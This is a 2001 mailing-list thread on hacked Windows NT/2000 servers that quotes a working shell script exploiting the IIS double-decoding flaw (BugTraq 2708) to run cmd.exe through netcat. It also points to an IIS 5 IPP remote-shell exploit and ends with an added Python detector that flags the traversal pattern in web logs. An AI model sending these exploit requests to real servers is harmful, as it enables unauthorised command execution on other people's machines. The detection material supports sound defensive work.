RE: Hacked NT/2K box

From: Sam Wilson (swilson@numbsafari.com)
Date: 07/25/01


Date: Tue, 24 Jul 2001 20:04:40 -0400 (EDT)
From: Sam Wilson <swilson@numbsafari.com>
To: H C <keydet89@yahoo.com>
Subject: RE: Hacked NT/2K box
Message-ID: <Pine.BSO.4.10.10107241959300.29503-200000@mail.numbsafari.com>


Sorry about that. I was thinking of the wrong exploit. The previous
exploit I mentioned DOES give you the ability to execute arbitrary command
line statements and see the output (which is only marginally useful, but
nasty nonetheless). However, it does affect IIS 4 and IIS 5.

The one I was thinking about affects only IIS 5 with Internet Printing
Protocol enabled. By using Jill.c (attached), you can get the remote
console thing working. Please reference BugTraq ID # 2674 ("Microsoft
Windows 2000 IIS 5.0 IPP ISAPI 'Host:' Buffer Overflow Vulnerability").
The exploit is from "dark spyrit".

Sam Wilson
Software Engineer
ECount, Inc.

On Tue, 24 Jul 2001, H C wrote:

> Sam,
>
> Looking through the script you posted, I don't see how
> it's able to obtain a remote shell from a Unix system.
> I can see how it's simply passing the extended
> Unicode URL to the web server, by piping it through
> netcat. However, there is no unusual or special code
> added...about all you would expect to see back is a
> directory listing if the target server is vulnerable.
>
>
> Can you point out the part in the script that allows
> one to obtain a remote shell on the target?
>
> thanks
>
> --- Sam Wilson <swilson@numbsafari.com> wrote:
> > I'm not sure if you remember this exploit from back
> > in May, but essentially,
> > using a UNIX box you can obtain a remote console on
> > an affected Win2K box.
> > Without reading the script again or spending too
> > many brain cycles on
> > remembering the details I believe the exploit does
> > *NOT* require having
> > RConsole or Terminal services installed on the
> > victim.
> >
> > The Exploit has bugtraq ID 2708 and is titled "MS
> > IIS/PWS Escaped Characters
> > Decoding Command Execution Vulnerability". A
> > gentleman by the name of "Leif
> > Jakob <bugtraq@jakob.weite-welt.com> has provided
> > the 'IIS_escape_test.sh'
> > exploit." I've pasted my copy of the script below my
> > sig.
> >
> > We never experienced this attack in the wild,
> > however we did use the exploit
> > in a test environment to confirm it. It works.
> > Rather nicely, actually.
> >
> > Hope that helps.
> >
> > Sam Wilson
> > Software Engineer
> > swilson@ecount.com
> >
> > ---------------------
> > #!/bin/sh
> >
> > # Copyright 2001 by Leif Jakob <bugtraq@jakob.weite-welt.com>
> > #
> > # do not abuse this code... blah blah :)
> >
> > if [ -z "$1" ] ; then
> >     echo "usage:"
> >     echo "$0 hostname"
> >     exit 1
> > fi
> >
> > host="$1"
> >
> > # locate netcat under either of its usual names
> > NETCAT=`which netcat`
> >
> > if [ -z "$NETCAT" ] ; then
> >     NETCAT=`which nc`
> > fi
> >
> > if [ -z "$NETCAT" -o ! -x "$NETCAT" ] ; then
> >     echo "you need netcat to make this work"
> >     exit 1
> > fi
> >
> > echo "using netcat:$NETCAT"
> >
> > # write one HTTP/1.0 request to stdout: the path climbs $count
> > # directories with the double-encoded backslash '..%255c' and then
> > # names cmd.exe with the command in the query string
> > makeRequest()
> > {
> >     host="$1"
> >     count=$2
> >     cmd="$3"
> >     echo -n 'GET /scripts/'
> >     while [ $count -gt 0 ] ; do
> >         echo -n '..%255c'
> >         count=$((count-1))
> >     done
> >     echo -n 'winnt/system32/cmd.exe?/c+'
> >     echo -n "$cmd"
> >     echo ' HTTP/1.0'
> >     echo "Host: $host"
> >     echo ''
> >     echo 'dummy'
> > }
> >
> > testHost()
> > {
> >     host="$1"
> >     count=10 # you can't overdo it
> >     cmd='dir+c:\'
> >     # send the request with the netcat located above; the reply
> >     # (a directory listing on a vulnerable server) comes back on stdout
> >     makeRequest "$host" "$count" "$cmd" | "$NETCAT" -w 4 "$host" 80
> > }
> >
> > testHost "$host"
> >
>
>
>
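H C's point above is the key one for anyone defending a server: the script does nothing clever on the wire, it just sends a request whose path contains the double-encoded backslash `..%255c` enough times to walk up to `winnt/system32/cmd.exe`, and a server that decodes the path twice (BugTraq ID 2708) runs the command. That same request shape is what should light up in web logs or an IDS. The following is an added example, not part of this thread or of Leif Jakob's script: it decodes a path the way the buggy server does, flags a traversal that ends in cmd.exe, and runs the check over a few constructed IIS-style log lines. The log field order, client addresses and timestamps are assumed for illustration, and the check generalises beyond `..%255c` to other double-encoded forms such as `%252e%252e`.

```python
import re
from urllib.parse import unquote

# A '..' segment bounded by separators (after backslashes are folded to '/'),
# i.e. one step out of the directory the request started in.
TRAVERSAL_SEGMENT = re.compile(r"(?:^|/)\.\.(?:/|$)")


def decode_like_buggy_iis(path, rounds=2):
    """Percent-decode `path` `rounds` times and fold '\\' to '/'.

    BID 2708 is IIS decoding an already-decoded path a second time, so
    '..%255c' -> '..%5c' -> '..\\' -> '../'. A correct server stops after
    the first round, which is why a single decode sees nothing wrong.
    """
    decoded = path
    for _ in range(rounds):
        decoded = unquote(decoded)
    return decoded.replace("\\", "/")


def classify_request(raw_path):
    """Return the three indicators a defender cares about for one path."""
    once = decode_like_buggy_iis(raw_path, rounds=1)
    twice = decode_like_buggy_iis(raw_path, rounds=2)
    return {
        # the second decode changed the path: the client sent it double-encoded
        "double_encoded": twice != once,
        # a '..' segment survives after the buggy second decode
        "traversal": bool(TRAVERSAL_SEGMENT.search(twice)),
        # the walk ends at the command interpreter
        "command_shell": "cmd.exe" in twice.lower(),
    }


def is_escape_test_request(raw_path):
    """True for the request shape the quoted script builds."""
    v = classify_request(raw_path)
    return v["traversal"] and v["command_shell"]


# Constructed IIS-style log lines (assumed field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status).
SAMPLE_LOG = """\
2001-07-24 19:59:30 192.0.2.10 GET /default.htm - 200
2001-07-24 19:59:31 192.0.2.10 GET /scripts/..%255c..%255c..%255cwinnt/system32/cmd.exe /c+dir+c:\\ 200
2001-07-24 19:59:32 192.0.2.11 GET /scripts/%252e%252e%255cwinnt/system32/cmd.exe /c+dir 200
2001-07-24 19:59:33 192.0.2.12 GET /scripts/report.asp id=1 200
"""


def scan_log(text):
    """Return (client_ip, raw_uri) for every line carrying the pattern."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue  # not a complete record in the assumed format
        client_ip, uri_stem = fields[2], fields[4]
        if is_escape_test_request(uri_stem):
            hits.append((client_ip, uri_stem))
    return hits


if __name__ == "__main__":
    for ip, uri in scan_log(SAMPLE_LOG):
        print(f"double-decode traversal to cmd.exe from {ip}: {uri}")
```

Matching on the decoded form rather than on the literal string `..%255c` is the design choice here: a signature for the one string the script happens to emit misses `%252e%252e%255c` and the other spellings of the same walk, while decoding twice and looking for a surviving `..` segment catches all of them. The `double_encoded` flag on its own is also a useful low-noise indicator, since ordinary clients have no reason to send `%25` sequences that decode to further escapes.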